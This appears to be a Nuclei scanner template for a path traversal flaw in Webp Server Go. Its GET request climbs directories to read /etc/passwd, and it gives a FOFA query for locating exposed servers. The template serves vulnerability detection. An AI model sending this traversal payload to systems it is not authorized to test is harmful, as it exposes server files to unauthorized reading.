id: webp-server-lfi

info:
  name: Webp Server Go - Path Traversal
  author: ritikchaddha
  severity: high
  description: |
    Webp Server Go has an Path Traversal vulnerability. Attackers can use the vulnerability to access arbitraty file.
  reference:
    - https://github.com/webp-sh/webp_server_go/issues/92
  metadata:
    max-request: 1
    verified: true
    fofa-query: header="Webp-Server-Go"
  tags: webp,webp-server,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../../../../../../../../etc/passwd"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - 'contains(server, "Webp-Server-Go")'
          - "status_code == 200"
        condition: and
# digest: 490a0046304402203ef335a13e82e50120e64f215b929e7f65825820dd930ec99bfd1276f0b7637a022078db903c02a959852ede6e732d46f1f9c67fb48699e04b872da837f9578bce3f:922c64590222798bb761d5b6d8e72950